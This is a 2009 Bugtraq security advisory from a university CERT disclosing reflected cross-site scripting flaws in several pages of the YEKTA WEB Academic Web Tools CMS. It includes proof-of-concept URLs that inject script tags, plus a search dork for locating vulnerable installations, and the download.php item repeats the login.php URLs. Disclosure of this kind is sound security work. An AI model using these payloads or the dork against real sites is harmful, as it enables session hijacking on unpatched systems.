YEKTA WEB Academic Web Tools CMS Multiple XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: YEKTA WEB Academic Web Tools CMS Multiple XSS
From: mr.faghani@xxxxxxxxx
Date: 1 Mar 2009 11:58:13 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

============================================ IUT-CERT 
============================================

 Title: Academic Web Tools CMS Multiple XSS
 Vendor: www.yektaweb.com
 Vulnerable Version: 1.5.7 and priors
 Type: XSS
 Fix: N/A
 Dork: AWT YEKTA

============================================  nsec.ir 
============================================

Description:
------------------

        YEKTAWEB Academic Web Tools is a Persian Content Management System 
(CMS) for managing university
        affairs such as conferences, journals and etc.
    The built-in filter of this package can not prevent XSS attack on some 
parameters.



Vulnerabilities:
------------------

        1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and 
"redirect" parameters.
        http://yoursite/page.php?sid=[XSS]
        http://yoursite/page.php?logincase=[XSS]
        http://yoursite/page.php?redirect=[XSS]
        
        2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" 
and "redirect" parameters.
        http://yoursite/page_arch.php?sid=[XSS]
        http://yoursite/page_arch.php?logincase=[XSS]
        http://yoursite/page_arch.php?redirect=[XSS]


        3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and 
"redirect" parameters.
        http://yoursite/login.php?sid=[XSS]
        http://yoursite/login.php?logincase=[XSS]
        http://yoursite/login.php?redirect=[XSS]

        4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" 
and "redirect" parameters.
        http://yoursite/login.php?sid=[XSS]
        http://yoursite/login.php?logincase=[XSS]
        http://yoursite/login.php?redirect=[XSS]


Exploit/PoC:
------------------


Example: 
                
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
                
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
                
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>


Solution:
------------------

                Input Validation Filter should be patched.


Credit: 
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari

Prev by Date: Weekly Web Hacking Incidents update for Feb 25th
Next by Date: BlogMan 0.45 Multiple Vulnerabilities
Previous by thread: Weekly Web Hacking Incidents update for Feb 25th
Next by thread: BlogMan 0.45 Multiple Vulnerabilities
Index(es):
- Date
- Thread